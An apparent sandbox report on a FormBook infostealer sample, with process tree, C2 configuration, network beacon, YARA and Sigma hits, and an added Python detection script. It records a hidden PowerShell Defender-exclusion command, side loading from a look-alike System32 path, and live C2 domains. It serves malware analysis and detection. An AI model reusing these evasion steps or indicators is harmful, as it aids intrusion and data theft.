Analysis Report Citvonvhciktufwvyzyhistnewdjgsoqdr.exe

Overview

General Information

Sample Name: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
Analysis ID: 411769
MD5: 4e71f90d1817f44313f4e101ef393968
SHA1: 3932f9822134761e7bf9bc1902f8cc28b6820559
SHA256: aace20e28e61cb328da74ff938231b1ce9a07498d477efe3efc5c5d3d04b9dc1
Tags: exe, Formbook, signed

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
DLL side loading technique detected
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Suspicious powershell command line found
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Non Interactive PowerShell
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Citvonvhciktufwvyzyhistnewdjgsoqdr.exe (PID: 7056 cmdline: 'C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe' MD5: 4E71F90D1817F44313F4E101EF393968)
    • cmd.exe (PID: 6252 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\stt.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6592 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\PXOR.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • Netplwiz.exe (PID: 6408 cmdline: C:\Windows \System32\Netplwiz.exe MD5: F94B7FB6DAC49844D03C7087B2D8B472)
          • cmd.exe (PID: 6516 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Cdex.bat MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 5684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • powershell.exe (PID: 6920 cmdline: powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users'' MD5: 95000560239032BC68B4C2FDFCDEF913)
              • conhost.exe (PID: 6912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Citvon.exe (PID: 1320 cmdline: 'C:\Users\Public\Citvon\Citvon.exe' MD5: 4E71F90D1817F44313F4E101EF393968)
    • Citvon.exe (PID: 2920 cmdline: C:\Users\Public\Citvon\Citvon.exe MD5: 4E71F90D1817F44313F4E101EF393968)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 5252 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
        • autoconv.exe (PID: 5488 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • autofmt.exe (PID: 5556 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)
        • msiexec.exe (PID: 5560 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • Citvon.exe (PID: 4424 cmdline: 'C:\Users\Public\Citvon\Citvon.exe' MD5: 4E71F90D1817F44313F4E101EF393968)
    • Citvon.exe (PID: 4044 cmdline: C:\Users\Public\Citvon\Citvon.exe MD5: 4E71F90D1817F44313F4E101EF393968)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.clinics.life/qku9/"], "decoy": ["infinitilifecenters.com", "newsondogs.com", "enonen.com", "skinnybrew.asia", "evaair-dailoan.com", "kakao.delivery", "kenistic.com", "dichvuquatanghtc.com", "avbs1.xyz", "dornhome.com", "uuyuii.com", "elearningeasygenerator.com", "basnne.com", "snkrclassics.com", "healthtechcentral.com", "earthhoodpal.com", "voorgoed.com", "lazycooked.com", "openrank.site", "georgeswebwerks.com", "diabluma.com", "kenekch.net", "fragrans.paris", "dov12.com", "traumainformed.love", "rocket3freedom.com", "smartgrowcultiva.com", "financial345.com", "maxsecuritycompany.com", "ibitr.com", "tamhoo.com", "reciclar.space", "agustoscimerapk-tr.com", "risingstarg.com", "kambosito.space", "bossdeal.online", "xn--avenr-wsa.com", "tauznora.com", "rest-blog.com", "amercadear.com", "xn--e1agggwgm.xn--p1acf", "paintwaterlilly.com", "yago.pro", "kmakeupbrushes.com", "shawnshimazu.design", "homeverf.com", "latromi.com", "machacekbakery.com", "jillsfreegift.com", "nationwidemovingamerica.com", "healthyred.xyz", "thrg33.club", "orbit-shop.com", "akgunreklam.xyz", "vewesyqy.xyz", "contorig2.com", "reiadarealestate.com", "pmxgear.com", "chennaigranites.com", "jmboprivacy.com", "genunid.com", "alegria.club", "alexfuture.net", "anixussohigh.com"]}

Yara Overview

Dropped Files

Source: C:\Users\Public\novtiC.url | Rule: Methodology_Contains_Shortcut_OtherURIhandlers | Description: Detects possible shortcut usage for .URL persistence | Author: @itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000000.00000003.681744195.0000000003CA4000.00000004.00000001.sdmp | Rule: Methodology_Contains_Shortcut_OtherURIhandlers | Description: Detects possible shortcut usage for .URL persistence | Author: @itsreallynick (Nick Carr)
  • 0x1b4:$file: URL=
  • 0x198:$url_explicit: [InternetShortcut]
Source: 00000014.00000003.794009092.0000000003CD4000.00000004.00000001.sdmp | Rule: Methodology_Contains_Shortcut_OtherURIhandlers | Description: Detects possible shortcut usage for .URL persistence | Author: @itsreallynick (Nick Carr)
  • 0x1d84:$file: URL=
  • 0x1d68:$url_explicit: [InternetShortcut]
(137 further entries not shown)

Unpacked PEs

Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Source: 25.2.Citvon.exe.400000.0.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 25.2.Citvon.exe.400000.0.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(31 further entries not shown)

Sigma Overview

System Summary:

Sigma detected: Execution from Suspicious Folder
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\Public\Citvon\Citvon.exe, CommandLine: C:\Users\Public\Citvon\Citvon.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Citvon\Citvon.exe, NewProcessName: C:\Users\Public\Citvon\Citvon.exe, OriginalFileName: C:\Users\Public\Citvon\Citvon.exe, ParentCommandLine: 'C:\Users\Public\Citvon\Citvon.exe' , ParentImage: C:\Users\Public\Citvon\Citvon.exe, ParentProcessId: 1320, ProcessCommandLine: C:\Users\Public\Citvon\Citvon.exe, ProcessId: 2920
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users'', CommandLine: powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users'', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Cdex.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6516, ProcessCommandLine: powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command 'Add-MpPreference -ExclusionPath 'C:\Users'', ProcessId: 6920
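The Startup tree and the two Sigma hits above carry the host-side indicators of this chain: batch files staged in C:\Users\Public and run through cmd.exe, a copy of Netplwiz.exe launched from 'C:\Windows \System32' (note the space after 'Windows', a look-alike of the real trusted directory, with NETUTILS.dll dropped in the same folder, consistent with the DLL side loading signature), a hidden non-interactive PowerShell that excludes all of C:\Users from Defender, and 32-bit system binaries (WWAHost.exe, autoconv.exe, autofmt.exe, msiexec.exe) spawned by explorer.exe with empty command lines once the FormBook payload has been injected into it. The script below is an added example, not part of the report and not a Joe Sandbox or Sigma rule: EVENTS is constructed by hand from the process tree (command lines as the report renders them, with double quotes shown as single quotes; explorer.exe's image path and the control event with PID 9001 are assumed), and the rule names and record fields are this example's own.

```python
"""Host-side triage of the Citvon / FormBook process chain shown in this report.

Added example; not part of the Joe Sandbox report and not a Joe Sandbox or Sigma
rule. EVENTS is constructed from the Startup tree above; the parent image path
for explorer.exe and the benign control event (PID 9001) are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    parent_image: str   # "" where the report shows no parent
    image: str
    cmdline: str


EVENTS = [
    ProcEvent(7056, "", r"C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe",
              r"'C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe'"),
    ProcEvent(6252, r"C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe",
              r"C:\Windows\System32\cmd.exe", r"C:\Windows\system32\cmd.exe /c ''C:\Users\Public\stt.bat' '"),
    ProcEvent(6592, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\system32\cmd.exe /K C:\Users\Public\PXOR.bat"),
    ProcEvent(6408, r"C:\Windows\System32\cmd.exe", r"C:\Windows \System32\Netplwiz.exe",
              r"C:\Windows \System32\Netplwiz.exe"),
    ProcEvent(6516, r"C:\Windows \System32\Netplwiz.exe", r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\system32\cmd.exe /c C:\Users\Public\Cdex.bat"),
    ProcEvent(6920, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive "
              r"-Command 'Add-MpPreference -ExclusionPath 'C:\Users''"),
    ProcEvent(1320, "", r"C:\Users\Public\Citvon\Citvon.exe", r"'C:\Users\Public\Citvon\Citvon.exe'"),
    ProcEvent(2920, r"C:\Users\Public\Citvon\Citvon.exe", r"C:\Users\Public\Citvon\Citvon.exe",
              r"C:\Users\Public\Citvon\Citvon.exe"),
    # explorer.exe image path assumed; the report shows only the process name.
    ProcEvent(5252, r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\WWAHost.exe", r"C:\Windows\SysWOW64\WWAHost.exe"),
    ProcEvent(5560, r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\msiexec.exe", r"C:\Windows\SysWOW64\msiexec.exe"),
    # Benign control (constructed): a user-driven MSI install carries arguments.
    ProcEvent(9001, r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\msiexec.exe",
              r"C:\Windows\SysWOW64\msiexec.exe /i 'C:\Users\user\Downloads\setup.msi'"),
]

DEFENDER_EXCLUSION = re.compile(r"Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)\s+['\"]?([^'\"]+)", re.I)
USERS_PUBLIC = re.compile(r"^[a-z]:\\Users\\Public\\", re.I)
BATCH_FROM_PUBLIC = re.compile(r"/[ck]\s+['\"]*[a-z]:\\Users\\Public\\[^'\"\s]+\.bat", re.I)
SYSWOW64 = re.compile(r"^[a-z]:\\Windows\\SysWOW64\\", re.I)


def has_whitespace_padded_component(path: str) -> bool:
    """True for look-alike directories such as 'C:\\Windows \\System32' (space after
    'Windows'): a directory component that differs from itself stripped."""
    return any(p.strip() and p != p.strip() for p in path.split("\\")[:-1])


def has_arguments(cmdline: str) -> bool:
    """True if anything follows the program token, whether it is quoted or bare."""
    s = cmdline.strip()
    if s[:1] in ("'", '"'):
        end = s.find(s[0], 1)
        rest = s[end + 1:] if end > 0 else ""
    else:
        parts = s.split(None, 1)
        rest = parts[1] if len(parts) > 1 else ""
    return bool(rest.strip())


def rules_for(ev: ProcEvent) -> list:
    hits = []
    m = DEFENDER_EXCLUSION.search(ev.cmdline)
    if m:
        hits.append("defender_exclusion_added")
        # 'C:\Users' has a single separator: the exclusion covers every profile,
        # including C:\Users\Public where the payload and the .bat files live.
        if m.group(1).rstrip("\\").count("\\") <= 1:
            hits.append("defender_exclusion_broad")
    if has_whitespace_padded_component(ev.image):
        hits.append("mock_trusted_directory")
    if USERS_PUBLIC.match(ev.image):
        hits.append("execution_from_users_public")
    exe = ev.image.rsplit("\\", 1)[-1].lower()
    if exe == "cmd.exe" and BATCH_FROM_PUBLIC.search(ev.cmdline):
        hits.append("batch_from_users_public")
    if (SYSWOW64.match(ev.image) and ev.parent_image.lower().endswith("\\explorer.exe")
            and not has_arguments(ev.cmdline)):
        # FormBook injects into explorer.exe and has it start a 32-bit system
        # binary with an empty command line to host the final payload.
        hits.append("system_binary_spawned_bare_by_explorer")
    return hits


def triage_by_pid(events) -> dict:
    """Map each PID to the rule names it triggered; PIDs with no hits are omitted."""
    return {ev.pid: hits for ev in events if (hits := rules_for(ev))}


if __name__ == "__main__":
    for pid, hits in triage_by_pid(EVENTS).items():
        print(pid, ", ".join(hits))
```

The bare-system-binary check is deliberately conditioned on the parent being explorer.exe and the command line carrying no arguments; the control event shows why, since msiexec.exe under explorer.exe with an /i argument is what an ordinary interactive install looks like. The mock-directory check does not rely on a fixed string and will also catch other padded components.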

Signature Overview

AV Detection:

Found malware configuration
Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (same C2 list and decoy domains as given under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Citvon\Citvon.exe | Metadefender: Detection: 35%
Source: C:\Users\Public\Citvon\Citvon.exe | ReversingLabs: Detection: 65%
Source: C:\Users\Public\NETUTILS.dll | ReversingLabs: Detection: 20%
Source: C:\Windows \System32\NETUTILS.dll | ReversingLabs: Detection: 20%
Multi AV Scanner detection for submitted file
Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Virustotal: Detection: 70%
Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Metadefender: Detection: 35%
Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | ReversingLabs: Detection: 65%
Yara detected FormBook
Source: Yara match | File source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\Citvon\Citvon.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Joe Sandbox ML: detected
Source: 25.2.Citvon.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 27.2.Citvon.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 27.1.Citvon.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 25.1.Citvon.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: Binary string: msiexec.pdb | source: Citvon.exe, 00000019.00000002.867393416.0000000000960000.00000040.00000001.sdmp
Source: Binary string: msiexec.pdbGCTL | source: Citvon.exe, 00000019.00000002.867393416.0000000000960000.00000040.00000001.sdmp
Source: Binary string: netplwiz.pdb | source: Netplwiz.exe, 00000008.00000002.702460692.00007FF61AD35000.00000002.00020000.sdmp
Source: Binary string: netplwiz.pdbGCTL | source: Netplwiz.exe, 00000008.00000002.702460692.00007FF61AD35000.00000002.00020000.sdmp
Source: Binary string: wntdll.pdbUGP | source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, 00000003.00000002.698168920.0000000000B8F000.00000040.00000001.sdmp, Citvon.exe, 00000019.00000002.867470145.00000000009C0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Citvon.exe, 00000019.00000002.867470145.00000000009C0000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe | Code function: 4x nop then pop edi

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.clinics.life/qku9/
Source: global traffic | HTTP traffic detected: GET /qku9/?6lPDSJPH=4N2BxPNrndQhx4f7lxE8pKNuaIuSTDwEioPJ3Oup1sIb+BTUhD7Z9dt/VxNIQWQk9DQP&u8eTH=YdsPJP HTTP/1.1 | Host: www.georgeswebwerks.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 198.54.117.212
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
Source: powershell.exe, 0000000D.00000002.752129080.00000172C22AF000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Citvon.exe, 00000014.00000003.752641816.00000000008C4000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microsof
Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, 00000000.00000003.658488547.000000000094F000.00000004.00000001.sdmp, Citvon.exe, 00000011.00000003.736683075.000000000083A000.00000004.00000001.sdmp, Citvon.exe, 00000014.00000003.752669738.00000000008D0000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: Citvon.exe, 00000014.00000003.752641816.00000000008C4000.00000004.00000001.sdmp | String found in binary or memory: http://mscrl.micro
Source: powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, 00000000.00000003.658488547.000000000094F000.00000004.00000001.sdmp, Citvon.exe, 00000011.00000003.736683075.000000000083A000.00000004.00000001.sdmp, Citvon.exe, 00000014.00000003.752669738.00000000008D0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, 00000000.00000003.658494505.0000000000953000.00000004.00000001.sdmp, Citvon.exe, 00000011.00000003.736683075.000000000083A000.00000004.00000001.sdmp, Citvon.exe, 00000014.00000003.752669738.00000000008D0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 0000000D.00000002.752441482.00000172C23D0000.00000004.00000001.sdmp | String found in binary or memory: http://osoft.com/PKI/doefault.htm0
Source: powershell.exe, 0000000D.00000002.736725813.00000172AA2B1000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.752441482.00000172C23D0000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.microsoft.coT
Source: powershell.exe, 0000000D.00000002.736959186.00000172AA43B000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000D.00000002.735431704.00000172AA0A1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.736959186.00000172AA43B000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.736725813.00000172AA2B1000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.736725813.00000172AA2B1000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000003.711204031.00000172ABE21000.00000004.00000001.sdmp | String found in binary or memory: https://go.micro
